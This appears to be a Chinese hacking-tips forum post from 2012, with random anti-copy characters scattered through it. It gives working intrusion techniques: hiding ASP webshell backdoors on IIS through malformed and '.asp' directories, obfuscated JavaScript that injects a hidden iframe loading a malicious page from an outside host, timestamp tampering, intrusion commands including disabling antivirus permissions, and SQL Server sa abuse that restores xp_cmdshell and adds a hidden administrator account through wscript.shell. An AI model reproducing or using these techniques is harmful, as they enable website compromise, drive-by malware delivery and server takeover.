: [- y; L, U! _% e$ Z/ U1、建立非标准目录:mkdir images..\
+ R% t5 |; R$ b; B! J4 Q拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp& ?+ o+ W' `1 d8 O" i* t5 ^" \4 y
通过web访问ASP木马:http://ip/images../news.asp?action=login( R- @6 O. d+ Q5 c
如何删除非标准目录:rmdir images..\ /s
, M6 G2 x0 |) S# w8 J2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:# Y$ y5 z, N$ e: [+ W+ b
mkdir programme.asp
; Y: h2 b" t3 ^1 c5 p& [# D B9 C新建1.txt文件内容:<!--#include file=”12.jpg”-->! }3 P$ E t8 D5 z
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
* _+ }2 _# C* w# {' V/ vattrib +H +S programme.asp- J w2 x! Z6 N- E# v# t
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
. Y; m* {! M4 Q: m% D, d
) l( ^3 t5 R! {9 E- f54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。7 d# d: F; w- r7 V: Q
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
6 l' u7 z, S4 O w+ z
5 V+ R+ n; K! p# ^* W, b! N55、JS隐蔽挂马8 c7 U) {" a* U3 d" }$ B+ f: b8 O! D4 [
1.# B. U6 ~, ~3 J a" C8 v
var tr4c3="<iframe src=ht";7 s; B* E# R) z5 B0 c
tr4c3 = tr4c3+"tp:/";
3 m% U- x; w! ^; ^' [tr4c3 = tr4c3+"/ww";! N$ n5 o3 C& H1 B$ H1 t1 `+ r$ }5 F
tr4c3 = tr4c3+"w.tr4";: L2 ]/ `6 N6 U
tr4c3 = tr4c3+"c3.com/inc/m";
5 \, x0 a! Y* z9 i+ }7 vtr4c3 = tr4c3+"m.htm style="display:none"></i";+ u2 t/ F1 T( {2 I
tr4c3 =tr4c3+"frame>'";
" h, i$ Q8 ]; i& K% r& Xdocument.write(tr4c3);
, {0 z# P) j& _4 Q避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。1 R2 v! M5 J0 J3 B5 w
; M0 t* q& |6 |7 c4 p1 x
2.7 v- |+ r) |; G9 n/ e, R& K
转换进制,然后用EVAL执行。如 H: h- g/ q. m- h" {
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
( H5 l1 c1 _6 I8 @$ W不过这个有点显眼。+ a; y' Q( c0 C6 v5 K Q5 n, G
3.& U$ z- C, B9 R0 ^" V. S$ `
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');4 w/ ^) G" {* F2 a1 l* K
最后一点,别忘了把文件的时间也修改下。
, O1 \& T& Q2 e# f9 @, ~* P, S" y7 l: ?1 p& Z( i7 T3 Z2 N
56.3389终端入侵常用DOS命令
5 H0 Z( }# v- Q/ M4 W( gtaskkill taskkill /PID 1248 /t7 _) }2 G1 N; B. z( l5 g2 Y
" v5 Y- T. {9 W( ~; q$ B4 Stasklist 查进程
* G5 T' ~! l. B( A- @+ o" l9 L- W' K* k! y3 X
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
( A1 s2 \# p; ?) z2 Piisreset /reboot
: }9 |. D5 u( O, l8 B3 P* s8 B3 Itsshutdn /reboot /delay:1 重起服务器! q) i( V! X! M7 s ~- A% x
2 I! M; W2 x n+ O0 Z3 [
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,) x% D! g) V# }
: s V+ ` ^# G2 G2 N6 O# p; w6 U i
query user 查看当前终端用户在线情况# ]. ], x' {) U x& g
* Y/ s. {8 e' i# G- e0 P/ W; |
要显示有关所有会话使用的进程的信息,请键入:query process *& s% l* m8 B# |6 p4 J6 f
0 e( F& {6 ~4 ]& W要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
% U& ~# f: ]8 a# `/ m6 k1 J. r! k* U0 F' D& l
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2/ ^5 L- ^+ f# A
, b6 Z! G) j3 f要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
8 F" M% r. l6 k7 Q4 K# E1 l& T1 U4 |; e0 Z; ]$ R' k
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
! l8 ?. s, J! N5 A, C( i& N4 r# o6 H3 {
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
- J# e! w) ~- ~9 |) s! e3 W7 L: w. |( R' ~7 @6 `2 H
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。& }5 ~" h2 |! ?. w: ]/ B! \; ]
, H: _4 q* P$ }
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机' H: A; a; }* F. k: K! [
% H7 v- r, q$ m; Z, Y56、在地址栏或按Ctrl+O,输入:& s" J* m" `& s$ v' r, q- r
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
K- T1 `# W+ F1 r% \2 q( e
/ u7 _! Z, z# L# a$ R- a; B! w源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
- d% D' N. H3 l) {8 d8 R) X# q3 S$ s: G1 m( \! t
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
, F- q1 W$ `& M( }# ~用net localgroup administrators是可以看到管理组下,加了$的用户的。! U0 @ n; G0 e/ Q N5 t% p! U. g
( M7 k; s% Q k( D4 w( ^! g! N58、 sa弱口令相关命令! B" U% H9 X9 }0 m. Z+ D6 S! L' A
3 v( v+ E3 m9 e: S! @一.更改sa口令方法:
6 S+ r# {6 l# H' K# z+ f# |用sql综合利用工具连接后,执行命令:$ F3 L" T9 p' Y% ?' o3 g3 [/ j* D
exec sp_password NULL,'20001001','sa'4 _ S5 ^: l5 X+ j3 s4 w; e: u w$ |$ ?
(提示:慎用!)
1 `) M2 w. k% J; B
: g2 T0 _6 n7 J1 K二.简单修补sa弱口令.4 t' M/ h" O% j0 n1 t0 N' ~
2 p0 s: Q5 k- b, {2 J+ f" h方法1:查询分离器连接后执行:; M2 a, r7 t3 T" L* `+ x
if exists (select * from
8 R- U7 i, A% ~5 `2 K7 U/ |: }dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and1 }5 s1 t) O7 K) h" P0 t- p
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
9 s8 g0 a# g' M. M. ?1 M% ~% D! T, V; t8 ~* @7 v
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'- D% B5 R' B/ S4 [* V8 I0 o
2 Z+ [8 T% T' ~ A
GO3 G- X2 \* X; R5 d0 d1 }
' G% F. a5 F, L9 C# w; i
然后按F5键命令执行完毕, a8 u6 |9 c% s1 Z( T
4 ^2 W9 K/ \% H3 p }3 V8 A. M! \方法2:查询分离器连接后+ B) Z0 E0 P/ Z1 N1 m: A
第一步执行:use master6 {4 ?/ L) o3 b# G. @
第二步执行:sp_dropextendedproc 'xp_cmdshell'
: W! b( r" f2 D& l然后按F5键命令执行完毕1 h7 W) l& Y3 y2 A6 K
0 @1 e% N8 e# h+ `% d. e/ K
0 a0 v& s+ q2 w) x9 A. W; S
三.常见情况恢复执行xp_cmdshell.
3 w3 o7 @/ j% u- Y- d* w
6 [6 T' B# _9 |* v: K3 [5 v/ R) [# y) L+ W# O$ t8 O6 R
1 未能找到存储过程'master..xpcmdshell'.
* c* s' v! U% Y- ?3 Q 恢复方法:查询分离器连接后,, {1 k7 ^; x: K7 c4 E7 \
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int! q+ k! h0 S$ C7 L
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'$ _# Q- |1 I' f7 d8 K
然后按F5键命令执行完毕
# P7 A1 X" q0 I5 K/ k' B3 n5 N4 E. a, ^. E
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)/ L, a- ]; E% f) i! Y
恢复方法:查询分离器连接后,
7 f5 L! e# d! N1 X3 m" m' S第一步执行:sp_dropextendedproc "xp_cmdshell"
9 @- S0 A( X: @第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' [/ y# s1 I4 p7 A4 i( J# D7 {
然后按F5键命令执行完毕
& m7 c2 c: {' I; k/ v# } g- d2 l& g- z& Q
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
4 Y: B# s! e' n' D9 O恢复方法:查询分离器连接后,
. u& j4 |4 w2 j- F" _第一步执行:exec sp_dropextendedproc 'xp_cmdshell'% u/ N0 A8 q) J/ _+ b
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
. ~' [4 y5 [+ j3 h3 ^4 ~3 H6 b然后按F5键命令执行完毕9 ?. o% I6 c/ k* z
( }. f \2 C; o1 H四.终极方法.) R0 Z) P% H) Y( A! L# {* J$ U7 u
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
0 V# G# R8 }& [9 a: f+ Q查询分离器连接后,
6 ^( x W4 _" x0 N8 m9 }2000servser系统:
$ F; c, c9 l8 d8 z5 g* Zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
\ D, q, s( t+ a5 x3 U1 }* l
6 U2 y" P; e2 L: y$ R- P3 t2 C( i, D0 Sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
1 z8 Y; B: M; a% X- V( w N
- D1 X8 @$ ?" x) y# o7 R7 gxp或2003server系统:- `2 N! g/ z) b/ ?1 p* ?
6 s- n% [ r/ i
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'" n' C( T7 x, X x0 r" y
% X. w6 C t7 b* Q- w: g( ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
8 _. m. f% ]) o1 K* T; b$ s |
发表于 2012-9-15 14:13:15
收藏
支持
反对